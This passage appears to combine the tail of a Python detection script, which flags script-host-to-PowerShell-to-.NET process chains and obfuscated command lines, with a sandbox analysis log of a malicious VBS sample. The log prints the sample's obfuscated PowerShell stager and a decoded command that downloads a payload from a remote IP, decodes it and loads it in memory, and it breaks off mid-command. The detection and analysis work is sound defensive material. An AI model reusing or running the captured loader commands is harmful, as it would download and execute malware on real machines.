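    ("encoded-command", re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}")),
    ("base64-unpack", re.compile(r"(?i)FromBase64String")),
    # '?' -> 'A' and '$$' -> 'A': the alphabet restoration used by both stages
    ("alphabet-substitution", re.compile(r"\.replace\(\s*'[^']{1,2}'\s*,\s*'A'\s*\)")),
    ("in-memory-assembly-load", re.compile(r"(?i)AppDomain\]::CurrentDomain\.Load\(")),
    ("download-to-file", re.compile(r"(?i)Invoke-WebRequest.*-OutFile")),
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return {pid: [labels]} for every event that trips a lineage or command-line rule."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        labels = []
        if name in SHELLS and pname in SCRIPT_HOSTS:
            labels.append("script-host-spawned-powershell")
        if name in DOTNET_HOSTS and pname in SHELLS:
            labels.append("powershell-spawned-dotnet-host")
        if name == "ping.exe" and pname in SHELLS and "127.0.0.1" in e.cmdline:
            labels.append("loopback-ping-delay")
        if name in SHELLS:
            labels += [label for label, rx in CMDLINE_INDICATORS if rx.search(e.cmdline)]
        if labels:
            findings[e.pid] = labels
    return findings


def lineage(events, pid):
    """Image basenames from the oldest known ancestor down to pid (stops at unknown ppid)."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def injected_hosts(events):
    """pids of .NET hosts whose ancestry contains both a script host and a PowerShell."""
    return [e.pid for e in events
            if basename(e.image) in DOTNET_HOSTS
            and SCRIPT_HOSTS & set(lineage(events, e.pid))
            and SHELLS & set(lineage(events, e.pid))]


if __name__ == "__main__":
    for pid, labels in triage(SAMPLE_EVENTS).items():
        print(pid, " -> ".join(lineage(SAMPLE_EVENTS, pid)), labels)
    print("injected hosts:", injected_hosts(SAMPLE_EVENTS))
```

The lineage walk stops at the first pid absent from the event set, so on real telemetry feed it the host's full process list rather than only the alerted events; the benign inventory.ps1 launch trips none of the rules because it has neither a script-host parent nor an unpacking indicator on its command line.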
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (the VBScript engine CLSID, resolved to vbscript.dll)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: sostener.vbs | Static file information: File size 3462610 > 1048576

                  Data Obfuscation

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwB
i?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;$global:?
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?B
v?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 